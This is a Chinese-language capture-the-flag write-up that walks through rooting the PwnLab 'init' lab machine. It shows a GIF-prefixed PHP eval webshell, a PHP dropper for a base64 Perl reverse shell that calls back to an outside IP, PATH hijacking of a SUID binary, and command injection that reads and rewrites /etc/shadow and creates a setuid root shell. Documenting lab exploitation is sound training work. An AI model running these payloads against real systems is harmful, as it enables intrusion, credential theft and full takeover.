靶场71 nmap扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ nmap 172.17.135.71 -sS -Pn -O Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-23 21:03 CST Nmap scan report for 172.17.135.71 Host is up (0.0034s latency). Not shown: 997 closed ports PORT STATE SERVICE 80/tcp open http 111/tcp open rpcbind 3306/tcp open mysql Device type : general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.6 Network Distance: 3 hops OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 1 IP address (1 host up) scanned in 5.27 seconds
dirb扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 $ dirb http://172.17.135.71 ctf/dir/php.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu May 23 21:12:43 2019 URL_BASE: http://172.17.135.71/ WORDLIST_FILES: ctf/dir/php.txt ----------------- GENERATED WORDS: 3355 ---- Scanning URL: http://172.17.135.71/ ---- + http://172.17.135.71//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../ (CODE:200|SIZE:332) + http://172.17.135.71//index.php (CODE:200|SIZE:332) + http://172.17.135.71//config.php (CODE:200|SIZE:0) + http://172.17.135.71//login.php (CODE:200|SIZE:250) + http://172.17.135.71//upload.php?action=upfile (CODE:200|SIZE:19) + http://172.17.135.71//upload.php (CODE:200|SIZE:19) + http://172.17.135.71//upload/ (CODE:200|SIZE:4774) + http://172.17.135.71//../admin (CODE:400|SIZE:305) + http://172.17.135.71//../admin.php (CODE:400|SIZE:305) + http://172.17.135.71//../admin/default (CODE:400|SIZE:305) + http://172.17.135.71//../admin/default.php (CODE:400|SIZE:305) + http://172.17.135.71//../admin/index (CODE:400|SIZE:305) + http://172.17.135.71//../admin/index.php (CODE:400|SIZE:305) + http://172.17.135.71//../admin/login (CODE:400|SIZE:305) + http://172.17.135.71//../admin/login.php (CODE:400|SIZE:305) + http://172.17.135.71//../admin/manage (CODE:400|SIZE:305) + http://172.17.135.71//../admin/manage.php (CODE:400|SIZE:305) ----------------- END_TIME: Thu May 23 21:12:51 2019 DOWNLOADED: 3355 - FOUND: 17 $ dirb http://172.17.135.71 ctf/dir/dir.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu May 23 21:13:38 2019 URL_BASE: http://172.17.135.71/ WORDLIST_FILES: ctf/dir/dir.txt ----------------- GENERATED WORDS: 1170 ---- Scanning URL: http://172.17.135.71/ ---- + http://172.17.135.71//images/ (CODE:200|SIZE:942) + http://172.17.135.71//upload (CODE:301|SIZE:315) + http://172.17.135.71//images (CODE:301|SIZE:315) ----------------- END_TIME: Thu May 23 21:13:41 2019 DOWNLOADED: 1170 - FOUND: 3
可疑位置 http://172.17.135.71/index.php?page=login 这里指定了一个页面,尝试指定伪协议 伪协议学习https://lorexxar.cn/2016/09/14/php-wei/ http://172.17.135.71/index.php?page=php://filter/read=convert.base64-encode/resource=index.php 没有结果,因为上面使用的是页面名?page=login,所以使用php://filter/read=convert.base64-encode/resource=index
index.php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 <?php if (isset ($_COOKIE ['lang' ])){ include ("lang/" .$_COOKIE ['lang' ]); } ?> <html> <head> <title>PwnLab Intranet Image Hosting</title> </head> <body> <center> <img src="images/pwnlab.png" ><br /> [ <a href="/" >Home</a> ] [ <a href="?page=login" >Login</a> ] [ <a href="?page=upload" >Upload</a> ] <hr/><br/> <?php if (isset ($_GET ['page' ])){ include ($_GET ['page' ].".php" ); } else { echo "Use this server to upload and share image files inside the intranet" ; } ?> </center> </body> </html>
login 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <?php session_start ();require ("config.php" );$mysqli = new mysqli ($server , $username , $password , $database );if (isset ($_POST ['user' ]) and isset ($_POST ['pass' ])){ $luser = $_POST ['user' ]; $lpass = base64_encode ($_POST ['pass' ]); $stmt = $mysqli ->prepare ("SELECT * FROM users WHERE user=? AND pass=?" ); $stmt ->bind_param ('ss' , $luser , $lpass ); $stmt ->execute (); $stmt ->store_Result (); if ($stmt ->num_rows == 1 ) { $_SESSION ['user' ] = $luser ; header ('Location: ?page=upload' ); } else { echo "Login failed." ; } } else { ?> <form action="" method="POST" > <label>Username: </label><input id="user" type="test" name="user" ><br /> <label>Password: </label><input id="pass" type="password" name="pass" ><br /> <input type="submit" name="submit" value="Login" > </form> <?php }
config 1 2 3 4 5 6 <?php $server = "localhost" ;$username = "root" ;$password = "H4u%QJ_H99" ;$database = "Users" ;?>
upload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 <?php session_start ();if (!isset ($_SESSION ['user' ])) { die ('You must be log in.' ); }?> <html> <body> <form action='' method='post' enctype='multipart/form-data' > <input type='file' name='file' id='file' /> <input type='submit' name='submit' value='Upload' /> </form> </body> </html> <?php if (isset ($_POST ['submit' ])) { if ($_FILES ['file' ]['error' ] <= 0 ) { $filename = $_FILES ['file' ]['name' ]; $filetype = $_FILES ['file' ]['type' ]; $uploaddir = 'upload/' ; $file_ext = strrchr ($filename , '.' ); $imageinfo = getimagesize ($_FILES ['file' ]['tmp_name' ]); $whitelist = array (".jpg" ,".jpeg" ,".gif" ,".png" ); if (!(in_array ($file_ext , $whitelist ))) { die ('Not allowed extension, please upload images only.' ); } if (strpos ($filetype ,'image' ) === false ) { die ('Error 001' ); } if ($imageinfo ['mime' ] != 'image/gif' && $imageinfo ['mime' ] != 'image/jpeg' && $imageinfo ['mime' ] != 'image/jpg' && $imageinfo ['mime' ] != 'image/png' ) { die ('Error 002' ); } if (substr_count ($filetype , '/' )>1 ){ die ('Error 003' ); } $uploadfile = $uploaddir . md5 (basename ($_FILES ['file' ]['name' ])).$file_ext ; if (move_uploaded_file ($_FILES ['file' ]['tmp_name' ], $uploadfile )) { echo "<img src=\"" .$uploadfile ."\"><br />" ; } else { die ('Error 4' ); } } } ?>
接下来的思路就变成了登录mysql,把登录密码dump出来
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 $ mysql - uroot - h 172.17 .135 .71 - p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 23929 Server version: 5.5 .47 -0 + deb8u1 (Debian) Copyright (c) 2000 , 2019 , Oracle and / or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and / or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> use Users; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with - A Database changed mysql> select * from users; + | user | pass | + | kent | Sld6WHVCSkpOeQ= = | | mike | U0lmZHNURW42SQ= = | | kane | aVN2NVltMkdSbw= = | + 3 rows in set (0.00 sec)kent JWzXuBJJNy mike SIfdsTEn6I kane iSv5Ym2GRo
登陆后 上传文件, 限制太严格,无法上传 审计代码后发现,
1 2 3 4 if (isset ($_COOKIE ['lang' ])){ include ("lang/" .$_COOKIE ['lang' ]); }
参考资料
写一个用于写出木马文件的木马
1 2 3 4 5 6 GIF89a <?php $file =fopen ("divint3.php" ,"w" );$ma ="<?php @eval($_POST [divint3]); ?>" ;fwrite ($file , $ma );fclose ($file )
由于不知道木马写到哪里去了,失败了 使用小马 文件上传位置upload/068ae40523a24c9ef54edefd375e542d.gif 配置蚁剑 登陆成功,发现文件divint3.php,但是根目录下的divint3.php 内容不是我定义的内容,存疑
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 find / -perm -u=s -type f 2>/dev/null /bin/mount /bin/su /bin/umount /sbin/mount.nfs /usr/bin/newgrp /usr/bin/chfn /usr/bin/at /usr/bin/passwd /usr/bin/procmail /usr/bin/chsh /usr/bin/gpasswd /usr/lib/eject/dmcrypt-get-device /usr/lib/pt_chown /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/sbin/exim4
1 2 3 lsb_release -a getconf GNU_LIBC_VERSION glibc 2.19
使用pt_chown提权,无效
shell 反弹脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 <?php function which ($pr $path = execute ("which $pr " );return ($path ? $path : $pr );} function execute ($cfe $res = '' ;if ($cfe ) {if (function_exists ('exec' )) {@exec ($cfe ,$res ); $res = join ("\n" ,$res );} elseif (function_exists ('shell_exec' )) { $res = @shell_exec ($cfe );} elseif (function_exists ('system' )) { @ob_start (); @system ($cfe ); $res = @ob_get_contents ();@ob_end_clean (); } elseif (function_exists ('passthru' )) { @ob_start (); @passthru ($cfe ); $res = @ob_get_contents ();@ob_end_clean (); } elseif (@is_resource ($f = @popen ($cfe ,"r" ))) { $res = '' ;while (!@feof ($f )) {$res .= @fread ($f ,1024 );} @pclose ($f ); } } return $res ;} function cf ($fname ,$text if ($fp =@fopen ($fname ,'w' )) {@fputs ($fp ,@base64_decode ($text )); @fclose ($fp ); } } $yourip = "10.160.108.146" ;$yourport = "2333" ;$usedb = array ('perl' =>'perl' ,'c' =>'c' );$back_connect ="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" ."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" ."hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" ."sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" ."kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" ."KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" ."OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==" ;cf ('/tmp/.bc' ,$back_connect );$res = execute (which ('perl' )." /tmp/.bc $yourip $yourport &" );
先查看可用shell
1 2 3 4 5 6 (www-data:/var/www/html) $ cat /etc/shells /bin/sh /bin/dash /bin/bash /bin/rbash
在nologin中使用nc弹shell,反弹回来的是nologin,使用python -c "import pty;pty.spawn('/bin/rbash')"得到交互式shell
su 到kane iSv5Ym2GRo,登陆成功 得到假flagflag{T5566Y}
查看.bash_history
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 kane@pwnlab:~$ cat .bash_history cat .bash_historyuid id ls ./222.sh ls cd /hmoecd /homels cd /mikecat mikels -alcd ~ls -alecho '/bin/sh' >> 222.shchmod 777 222.shls ./222.sh echo `/bin/sh`export PATH=./:$PATH ./msgike ls -al./msgmike echo '/bin/sh' > cat chmod 777 cat ls ./msgmike
再次检查suid
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 kane@pwnlab:/home$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /bin/mount /bin/su /bin/umount /sbin/mount.nfs /home/kane/msgmike /usr/bin/newgrp /usr/bin/chfn /usr/bin/at /usr/bin/passwd /usr/bin/procmail /usr/bin/chsh /usr/bin/gpasswd /usr/lib/eject/dmcrypt-get-device /usr/lib/pt_chown /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/sbin/exim4
发现msgmike有suid
1 2 3 4 5 6 7 8 9 10 11 12 kane@pwnlab:~$ ls -la ls -latotal 40 drwxr-x--- 2 kane kane 4096 May 26 03:19 . drwxr-xr-x 6 root root 4096 Mar 17 2016 .. -rw------- 1 kane kane 244 Apr 25 09:53 .bash_history -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout -rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc -rwxrwxrwx 1 kane kane 10 May 21 09:56 cat -rw-r--r-- 1 root root 13 Apr 25 10:32 flag_wrong.txt -rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
粗略分析msgmike
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ELF`4l4(44444@@@@@ $LLL锟斤拷HHHDDP锟絫dXXX,,Q锟絫d/lib/ld-linux.so.2GNU GNU锟斤拷锟�3锟終锟絫g没锟斤拷}雸砮 锟終锟斤拷,E #3鈻� T4DHLPTS锟斤拷锟斤拷锟絎锟斤拷锟斤拷锟斤拷锟斤拷t锟�*锟絒锟斤拷5<锟�%@锟�%Dh锟斤拷锟斤拷锟斤拷%H锟斤拷锟斤拷锟斤拷%Lh锟斤拷锟斤拷锟斤拷%Ph鈻掞拷锟斤拷锟斤拷锟�%Th 锟斤拷锟斤拷锟�1锟絕锟斤拷锟斤拷锟絇TRh h锟絈Vh[锟斤拷锟斤拷锟斤拷f锟絝锟絝锟絝锟絝锟絝锟絝锟斤拷$锟絝锟絝锟絝锟絝锟絝锟絝锟斤拷c-`锟斤拷v鈻掞拷锟斤拷tU锟斤拷锟斤拷h`锟叫冿拷锟斤拷脨锟絫&锟絗-`锟斤拷锟斤拷锟斤拷锟斤拷锟絫锟斤拷tU锟斤拷锟斤拷Ph`锟揭冿拷锟斤拷脥t&锟斤拷'锟�=`uU锟斤拷锟斤拷|锟斤拷锟斤拷`锟斤拷锟絝锟斤拷H锟斤拷锟絬霌峷锟斤拷锟絫锟経锟斤拷锟斤拷P锟揭冿拷锟斤拷u锟斤拷锟斤拷L$锟斤拷锟斤拷q锟経锟斤拷Q锟斤拷锟絟锟絟锟斤拷锟斤拷锟斤拷锟斤拷锟絟锟絟锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷 h@锟絤锟斤拷锟斤拷锟斤拷M锟缴峚锟斤拷f锟経W1锟絍S锟斤拷锟斤拷锟斤拷锟絵锟斤拷锟絣$0锟斤拷 锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟絊锟斤拷c锟斤拷锟斤拷锟� 锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟�)锟斤拷锟斤拷锟絫'锟斤拷锟紻$8锟�,$锟紻锟紻$4锟紻$锟斤拷锟斤拷锟斤拷锟�9锟絬邇锟絒^_]锟斤拷 锟絒锟絚at /home/mike/msg.txt(锟斤拷锟斤拷D锟斤拷锟絟X锟斤拷锟斤拷锟斤拷锟斤拷锟絲R| \锟斤拷锟紽 J tx?鈻�;*2$"(@锟斤拷锟斤拷SD GuCu|@ A锟紺 8l锟斤拷锟斤拷a锟紸 锟紺锟紸锟絅0HA锟紸锟� AA锟斤拷锟斤拷锟斤拷0锟� $@鈻扗锟斤拷锟給锟斤拷锟� ^ 8(锟斤拷锟給锟斤拷锟斤拷o锟斤拷锟給zL&6FVGCC: (Debian 4.9.2-10) 4.9.2GCC: (Debian 4.8.4-1) 4.8.4.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.comment4Hh锟斤拷z锟斤拷 锟斤拷 锟� $8X锟紷DHL48X鈻抈鈻掞拷锟� (< P`鈻抃 v锟絏鈻掞拷锟� 锟絓鈻掞拷<锟斤拷锟斤拷a 锟� crtstuff.c__JCR_LIST__deregister_tm_clonesregister_tm_clones__do_global_dtors_auxcompleted.6279__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrymsgmike.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bxdata_start_edata_fini__data_startsystem@@GLIBC_2.0__gmon_start____dso_handle_IO_stdin_usedsetreuid@@GLIBC_2.0__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmainsetregid@@GLIBC_2.0_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable_init4#HH 1hh$D锟斤拷锟給锟斤拷 N 锟斤拷pV^^锟斤拷锟給zzk锟斤拷锟給锟斤拷 z 锟斤拷 B锟斤拷( 锟�#锟絗锟絗`锟斤拷$$锟�88锟絏X,锟斤拷锟斤拷锟紷@锟紻D锟紿H锟絃L锟�44锟�88 锟絏``锟�0`9锟絇- 锟� |
有一句
cat /home/mike/msg.txt 应该就是其所封装的命令
属主是mike
在history中有这么一句
那么,我们也构造一句
1 export PATH=/home/kane:$PATH
1 2 3 kane@pwnlab:~$ echo $PATH echo $PATH /home/kane:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
查看PATH中第一个目录的权限
1 2 3 kane@pwnlab:/usr/local$ ls -lad bin ls -lad bindrwxrwsr-x 2 root staff 4096 Mar 17 2016 bin
修改当前目录下的cat文件
1 kane@pwnlab:~$ echo "/bin/bash;ls " > cat
再次运行
./msgmike
1 2 3 kane@pwnlab:~$ ./msgmike ./msgmike mike@pwnlab:~$
现在是属主为root用户的suid文件,和上述套路一致
1 2 3 4 5 6 7 8 9 10 mike@pwnlab:/home/mike$ ls -la ls -latotal 28 drwxr-x--- 2 mike mike 4096 Mar 17 2016 . drwxr-xr-x 6 root root 4096 Mar 17 2016 .. -rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout -rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc -rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root -rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
执行一遍
1 2 3 4 5 mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: flag{T5566Y} flag{T5566Y} flag{T5566Y}
复制到tmp目录下,蚁剑查看内容
猜测代码为
1 /bin/echo %s >> /root/messages.txt
猜测源代码为
1 2 3 4 5 6 7 8 9 10 11 12 13 #include <stdio.h> void main () { char a[]; scanf ("%c" ,&a); char s[500 ]; sprintf (s,"/bin/echo %s >> /root/messages.txt" ,a); printf ("%s\n" ,s); system(s); }
1 2 3 4 a;sed -i 's@^root.*@root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g$' /etc/shadow;echo 0 /bin/echo "" ;sed "s@^root.*@root:$6$k /mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g" /etc/shadow;echo "hello" >> /root/messages.txt a;a=\";echo $a ;echo a
sed 可以看出来是直接返回我输入的内容 但是如果我输入的是带反引号的语句呢?
上面的实践无效
不行,深夜,我想到还是用普通的语句的老老实实的换吧
1 2 3 4 5 6 7 8 9 mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: "" ;grep "root" /etc/shadow;echo "" "" ;grep "root" /etc/shadow;echo "" root:$6$aYZMZ3V0$qAYwiR7aanVmKSWyV5IbRffspdjFx4xhLrm8kbHhh1DG16Bdb0 /ptImcDK2uT.6xc/FZotacYr0X4dB0SurjD/:16877:0:99999:7:::
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: "" ;cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo "" "" ;cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo "" mike@pwnlab:/home/mike$ cd cd mike@pwnlab:~$ ls ls cat flag_wrong.txt msgmike sh tqmike@pwnlab:~$ ls -la ls -latotal 1160 drwxr-x--- 2 kane kane 4096 May 26 17:47 . drwxr-xr-x 6 root root 4096 Mar 17 2016 .. -rw------- 1 kane kane 1245 May 26 10:36 .bash_history -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout -rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc -rwxrwxrwx 1 kane kane 14 May 26 17:01 cat -rw-r--r-- 1 root root 13 Apr 25 10:32 flag_wrong.txt -rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile -rwsr-sr-x 1 root root 1105840 May 26 17:47 sh -rwsr-sr-x 1 root root 38868 May 26 17:42 tq mike@pwnlab:~$ sh sh sh-4.3 whoami root sh-4.3
引用一下几个文件/etc/bash.bashrc /etc/profile /root/.profile /root/.bashrc 然后用vi强行修改/etc/shadow文件,登陆成功
1 2 3 root@pwnlab:/home/kane# id id uid=0(root) gid=0(root) groups=0(root)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 root@pwnlab:~ cat flag.txt.-=~=-. .-=~=-. (__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _) (_ ___) _____ _ (_ ___) (__ _) / __ \ | | (__ _) ( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __) (__ _) | | / _ \| '_ \ / _` | ' __/ _` | __/ __| (__ _) (_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___) (__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _) ( _ __) __/ | ( _ __) (__ _) |___/ (__ _) (__ _) (__ _) (_ ___) If you are reading this, means that you have break 'init' (_ ___) ( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __) (__ _) this challenge. (__ _) (_ ___) (_ ___) ( _ __) Please send me your feedback or your writeup, I will love ( _ __) (__ _) reading it (__ _) (__ _) (__ _) (__ _) For sniferl4bs.com (__ _) ( _ __) claor@PwnLab.net - @Chronicoder ( _ __) (__ _) (__ _) (_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___) `-._.-' `-._.-' root@pwnlab:~
1 2 3 4 5 6 python -c "import pty;pty.spawn('/bin/rbash')" su kane -c "iSv5Ym2GRo" cd /home/kane export PATH=/home/kane:$PATH echo "/bin/bash;ls " > cat ./msgmike
